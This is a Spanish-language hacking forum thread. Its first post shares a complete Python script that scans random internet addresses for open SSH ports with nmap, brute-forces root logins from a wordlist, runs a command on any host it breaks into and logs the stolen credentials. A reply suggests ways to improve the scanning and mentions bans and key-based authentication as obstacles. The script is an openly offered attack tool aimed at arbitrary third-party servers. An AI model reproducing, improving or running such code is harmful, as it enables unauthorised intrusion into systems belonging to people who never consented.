comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SSH BruteForce

  • 1 Respuestas
  • 2136 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado @ed33x

  • *
  • Underc0der
  • Mensajes: 107
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Enero 30, 2011, 10:13:43 am »
Código: Python
  1. #!/usr/bin/python
  2. #SSH BruteForcer that scans for random
  3. #open ssh ports using nmap and then brute
  4. #forces them.
  5.  
  6. #http://www.darkc0de.com
  7. #d3hydr8[at]gmail[dot]com
  8.  
  9. import sys, time, StringIO, commands, re
  10.  
  11. #Set the successful login file.
  12. save_file = "SSH_Logins.txt"
  13. #Set verbose mode: 1=on 0=off
  14. verbose = 1
  15. #Set the user to use.
  16. user = "root"
  17.  
  18. try:
  19.         import pexpect, pxssh
  20. except(ImportError):
  21.         print "\nYou need the pexpect module."
  22.         print "http://www.noah.org/wiki/Pexpect\n"
  23.         sys.exit(1)
  24.        
  25. def scan():
  26.         args = 'nmap -iR 1 -p 22 -open | grep open -B 3'
  27.         nmap = StringIO.StringIO(commands.getstatusoutput(args)[1]).read()
  28.         ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap)
  29.         if ipaddr:
  30.                 return ipaddr[0]
  31.  
  32. def brute(ip, word):
  33.         if verbose != 0:
  34.                 print "Trying:",word
  35.         try:
  36.                 s = pxssh.pxssh()
  37.                 s.login (ip, user, word, login_timeout=10)
  38.                 s.sendline (command)
  39.                 s.prompt()
  40.                 print "\n",s.before
  41.                 s.logout()
  42.                 print "\t[!] Login Success:",user, word,"\n"
  43.                 logins.writelines("SSH Login:"+ip+":22 "+user+" "+word+"\n")
  44.         except Exception, e:
  45.                 #print "[-] Failed"
  46.                 pass
  47.         except KeyboardInterrupt:
  48.                 print "\n[-] Quit\n"
  49.                 logins.close()
  50.                 sys.exit(1)
  51.  
  52. print "\n\t   d3hydr8:darkc0de.com sshBrute/Random v1.0"
  53. print "\t----------------------------------------------"
  54.        
  55. if len(sys.argv) != 3:
  56.         print "\nUsage : ./sshbrute_random.py <how many> <wordlist>"
  57.         print "Eg: ./sshbrute_random.py 1000 words.txt\n"
  58.         sys.exit(1)
  59.  
  60. num = sys.argv[1]
  61. command = 'uname -a'
  62. logins = open(save_file, "a")
  63.  
  64. try:
  65.         words = open(sys.argv[2], "r").readlines()
  66. except(IOError):
  67.         print "\n[-] Error: Check your wordlist path\n"
  68.         sys.exit(1)
  69.  
  70. print "\n[+] Loaded:",len(words),"words"
  71. print "[+] User:",user
  72. print "[+] Save file:",save_file
  73. if verbose != 0:
  74.         print "[+] Verbose Mode: On"
  75. else:
  76.         print "[+] Verbose Mode: Off"
  77. print "[+] Scanning:",num,"ips\n"
  78.  
  79. for x in xrange(int(num)):
  80.         print "[-] Scanning:",x+1,"of",num
  81.         ip = scan()
  82.         if ip != None:
  83.                 print "\n\t[+] BruteForcing:",ip,"\n"
  84.                 for word in words:
  85.                         #Change this time if needed
  86.                         time.sleep(0.5)
  87.                         brute(ip, word.replace("\n",""))
  88. logins.close()
  89. print "\n[-] Done\n"
  90.  
« Última modificación: Enero 18, 2013, 05:39:36 pm por 11Sep »
Me cambie de messenger ahora es: edeex@live.comNo tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado ksha

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Febrero 08, 2011, 11:42:00 am »
2 recomendaciones:

1. por que utiliza nmap si puedes conectar un socket a ese puerto y si no tiene el 22 abierto podria ser otro puerto.

puedes utilizar un db como la q tiene nmap para realizar finger printing del ssh.

2.- si es un buen server probablemente te baneen al 3 intento o al primero o quizas ni siquiera te deje logearte ya que utilizan llave publica.
No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



Python phpmyadmin "BruteForce"

Iniciado por linkgl

Respuestas: 2
Vistas: 2550
Último mensaje Agosto 19, 2011, 12:14:37 pm
por linkgl
Local Root Bruteforce por Wordlist

Iniciado por ProcessKill

Respuestas: 0
Vistas: 1346
Último mensaje Febrero 24, 2010, 04:10:42 pm
por ProcessKill
PoC incrementString [base para bruteforce]

Iniciado por blozzter

Respuestas: 0
Vistas: 1128
Último mensaje Octubre 24, 2011, 09:32:58 pm
por blozzter
Local Root Bruteforce por Wordlist

Iniciado por @ed33x

Respuestas: 0
Vistas: 1275
Último mensaje Enero 30, 2011, 10:09:36 am
por @ed33x
Bruteforce FTP Server

Iniciado por skollprog

Respuestas: 0
Vistas: 648
Último mensaje Diciembre 24, 2017, 02:53:57 pm
por skollprog